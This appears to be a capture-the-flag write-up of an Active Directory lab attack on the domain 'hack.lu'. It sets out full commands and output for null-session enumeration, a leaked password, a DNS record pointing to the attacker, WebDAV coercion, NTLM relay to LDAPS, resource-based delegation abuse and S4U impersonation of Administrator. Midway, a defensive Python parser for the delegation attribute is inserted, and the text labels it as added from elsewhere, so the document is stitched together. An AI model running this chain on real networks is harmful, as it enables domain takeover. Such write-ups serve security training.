Let's start by listing users with null authentication. Surprisingly, it worked against the DC and gave us a list of users, one of whom had their password in the description field:

```
➜ nxc smb targets.txt -u '' -p '' --users
SMB         10.244.0.11     445    SRV02            [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None)
SMB         10.244.0.10     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.lu) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.244.0.11     445    SRV02            [-] hack.lu\: STATUS_ACCESS_DENIED
SMB         10.244.0.10     445    DC01             [+] hack.lu\:
SMB         10.244.0.10     445    DC01             -Username-       -Last PW Set-        -BadPW-  -Description-
SMB         10.244.0.10     445    DC01             Gäst             <never>              0        Fördefinierat gästkonto för datorn/domänen
SMB         10.244.0.10     445    DC01             ta_bort.mig      2025-10-16 17:40:04  0        Praktikant: Lär sig Active Directory och hämtar kaffe med samma entusiasm. LjtLNg37LdcZin73
SMB         10.244.0.10     445    DC01             maja.lindgren    2025-10-16 17:40:04  0        Helpdesk-hjälte: Frågar alltid 'har du provat att starta om?' innan hon räddar dagen.
SMB         10.244.0.10     445    DC01             Freja.Lund       2025-10-16 17:40:04  0        Dekorationsguru: Gör hyllor glada. Vattnar växter mer punktligt än cronjobs.
SMB         10.244.0.10     445    DC01             Sven.Andersson   2025-10-16 17:40:04  0        Skruvkung: Monterar problem snabbare än manualen hinner öppnas.
SMB         10.244.0.10     445    DC01             Bjorn.Ek         2025-10-16 17:40:04  0        Instruktionsartist: Ritar manualer som ingen läser men alla behöver.
SMB         10.244.0.10     445    DC01             [*] Enumerated 6 localusers: HACK
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
```
```
➜ bloodhound-python -c all -u 'ta_bort.mig' -p 'LjtLNg37LdcZin73' -d hack.lu -dc dc01.hack.lu -ns 10.244.0.10 --disable-pooling -w1 --dns-timeout 30 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: hack.lu
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.hack.lu
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc01.hack.lu
INFO: Found 9 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 1 workers
INFO: Querying computer: SRV02.hack.lu
INFO: Querying computer: DC01.hack.lu
INFO: Done in 00M 27S
INFO: Compressing output into 20251020152455_bloodhound.zip
```

However, our current user can't do much.
LDAP Signing & Channel Binding
We notice something very important here: there is no LDAP signing or channel binding on the DC, which means NTLM authentication can be relayed to LDAP. To learn more about this topic I suggest you read this blogpost from TrustedSec. More resources are listed in the resources section at the end of this writeup.

```
➜ nxc ldap dc01.hack.lu
LDAP        10.244.0.10     389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hack.lu) (signing:None) (channel binding:Never)
```
Plan
The first thing we'll do is coerce authentication from SRV02, which is running the WebClient service. The coerced connection will use the SRV02$ machine account to authenticate to our machine. Since WebDAV uses HTTP, the machine will authenticate with NTLM over a web request, and we'll be able to relay that authentication to LDAP because signing isn't enforced there.
The relay will let us write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the target computer object (SRV02$) and then impersonate any user on that machine.
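The attribute the plan targets, msDS-AllowedToActOnBehalfOfOtherIdentity, is stored as a binary self-relative security descriptor, so the defender-side check is to decode each computer's DACL and confirm that every SID allowed to act on its behalf is expected. The parser below is an added example, not code from the writeup, impacket or netexec; the descriptor bytes and the SID inside them are constructed for the example.

```python
import struct

# Constructed sample: one self-relative SD with a single ACCESS_ALLOWED ACE for
# the made-up SID S-1-5-21-1111-2222-3333-1105 (not from the page or any real domain).
SAMPLE_RBCD_SD = bytes.fromhex(
    "01000480" "00000000" "00000000" "00000000" "14000000"   # SD header, DACL at offset 0x14
    "04002c0001000000"                                        # ACL header: rev 4, 44 bytes, 1 ACE
    "00002400" "00000010"                                     # ACE: type 0 (allowed), 36 bytes, mask
    "0105000000000005" "15000000" "57040000" "ae080000" "050d0000" "51040000"  # SID
)

ACE_NAMES = {0x00: "ACCESS_ALLOWED", 0x01: "ACCESS_DENIED", 0x05: "ACCESS_ALLOWED_OBJECT"}

def parse_sid(buf, off):
    """Decode a binary SID at buf[off:] into S-1-5-... form; returns (text, size)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count

def parse_rbcd(sd):
    """List (ace_type, access_mask, sid) for every ACE in the DACL of a self-relative SD."""
    rev, _sbz1, control, _owner, _group, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & 0x0004 or dacl_off == 0:
        return []                                   # SE_DACL_PRESENT unset: nobody is trusted
    _acl_rev, _sbz, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, dacl_off)
    entries, off = [], dacl_off + 8
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        mask = struct.unpack_from("<I", sd, off + 4)[0]
        # Plain allowed/denied ACEs carry the SID right after the mask; object ACEs
        # have extra GUID fields first, so only the former are decoded here.
        sid = parse_sid(sd, off + 8)[0] if ace_type in (0x00, 0x01) else None
        entries.append((ACE_NAMES.get(ace_type, "ACE_%#x" % ace_type), mask, sid))
        off += ace_size
    return entries

def allowed_to_act(sd):
    """SIDs that may use S4U2Proxy against this computer; anything unexpected is a finding."""
    return [sid for ace_type, _mask, sid in parse_rbcd(sd) if ace_type == "ACCESS_ALLOWED"]

if __name__ == "__main__":
    for ace_type, mask, sid in parse_rbcd(SAMPLE_RBCD_SD):
        print("%-22s mask=%#010x %s" % (ace_type, mask, sid))
```

Feeding it the raw attribute value read from LDAP for each computer object, and diffing the returned SIDs against the list of principals that are supposed to have delegation rights, turns the relay's result into an auditable finding.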
NTLM Relay to LDAPS
We can use the webdav module from netexec to check whether the WebClient service is enabled on SRV02, which is the case here:

```
➜ nxc smb srv02.hack.lu -u 'ta_bort.mig' -p 'LjtLNg37LdcZin73' -M webdav
SMB         10.244.0.11     445    SRV02            [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None)
SMB         10.244.0.11     445    SRV02            [+] hack.lu\ta_bort.mig:LjtLNg37LdcZin73
WEBDAV      10.244.0.11     445    SRV02            WebClient Service enabled on: 10.244.0.11
```
We also check the Machine Account Quota value using the maq module.
As you can see, the MachineAccountQuota value is 10, which is the default. This will let us create a machine account later for our RBCD attack, since every machine account comes with an SPN.
The only thing left now is to add a new DNS record that points to our attacker machine, because the WebClient connection string needs to be a hostname rather than an IP address. Adding DNS records is allowed by default for all domain users.
Let's use the dnstool.py tool from the krbrelayx repo:

```
➜ dnstool.py -u 'hack.lu\ta_bort.mig' -p 'LjtLNg37LdcZin73' 10.244.0.10 -a add -d 10.244.2.2 -r 'pwned.hack.lu'
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
```
Let's verify that the DNS record has been created and is pointing to our attacker's IP address.
Alternatively, we can use dnstool's query action (-a query):

```
➜ dnstool.py -u 'hack.lu\ta_bort.mig' -p 'LjtLNg37LdcZin73' 10.244.0.10 -a query -d 10.244.2.2 -r 'pwned.hack.lu'
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found record pwned
DC=pwned,DC=hack.lu,CN=MicrosoftDNS,DC=DomainDnsZones,DC=hack,DC=lu
[+] Record entry:
 - Type: 1 (A) (Serial: 36)
 - Address: 10.244.2.2
```
Next, we set up our listener to relay the authentication to LDAPS on the DC, using the --delegate-access flag so that the relay writes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on SRV02:

```
➜ ntlmrelayx.py -t ldaps://dc01.hack.lu -smb2support --delegate-access
Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Multirelay disabled

[*] Servers started, waiting for connections
```
Finally, we can use dementor (or any similar coercion tool, such as PetitPotam, …) to coerce WebClient HTTP authentication:

```
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] (HTTP): Connection from 10.244.0.11 controlled, attacking target ldaps://dc01.hack.lu
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] (HTTP): Authenticating connection from HACK/SRV02$@10.244.0.11 against ldaps://dc01.hack.lu SUCCEED [1]
[*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> Enumerating relayed user's privileges. This may take a while on large domains
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] All targets processed!
[*] (HTTP): Connection from 10.244.0.11 controlled, but there are no more targets left!
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] (HTTP): Client requested path: /x/pipe/spoolss
[*] All targets processed!
[*] (HTTP): Connection from 10.244.0.11 controlled, but there are no more targets left!
[*] (HTTP): Client requested path: /x/pipe
[*] (HTTP): Client requested path: /x/pipe
[*] All targets processed!
[*] (HTTP): Connection from 10.244.0.11 controlled, but there are no more targets left!
[*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> Attempting to create computer in: CN=Computers,DC=hack,DC=lu
[*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> Adding new computer with username: SKQUJUFW$ and password: /7@R:6{i6r7+9Na result: OK
[*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> Delegation rights modified succesfully!
[*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> SKQUJUFW$ can now impersonate users on SRV02$ via S4U2Proxy
```
We can now request a service ticket as Administrator for SRV02 and use it to authenticate:

```
➜ getST.py -impersonate Administrator -spn cifs/srv02.hack.lu -dc-ip 10.244.0.10 hack.lu/'SKQUJUFW$':'/7@R:6{i6r7+9Na'
Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_srv02.hack.lu@HACK.LU.ccache
➜ export KRB5CCNAME=Administrator@cifs_srv02.hack.lu@HACK.LU.ccache
➜ nxc smb srv02.hack.lu --use-kcache
SMB         srv02.hack.lu   445    SRV02            [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None)
SMB         srv02.hack.lu   445    SRV02            [+] hack.lu\Administrator from ccache (Pwn3d!)
```
Or we can automate all of that using the --delegate option from netexec:

```
➜ nxc smb srv02.hack.lu -u 'SKQUJUFW$' -p '/7@R:6{i6r7+9Na' --delegate administrator
SMB         srv02.hack.lu   445    SRV02            [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None)
SMB         srv02.hack.lu   445    SRV02            [+] hack.lu\administrator through S4U with SKQUJUFW$ (Pwn3d!)
```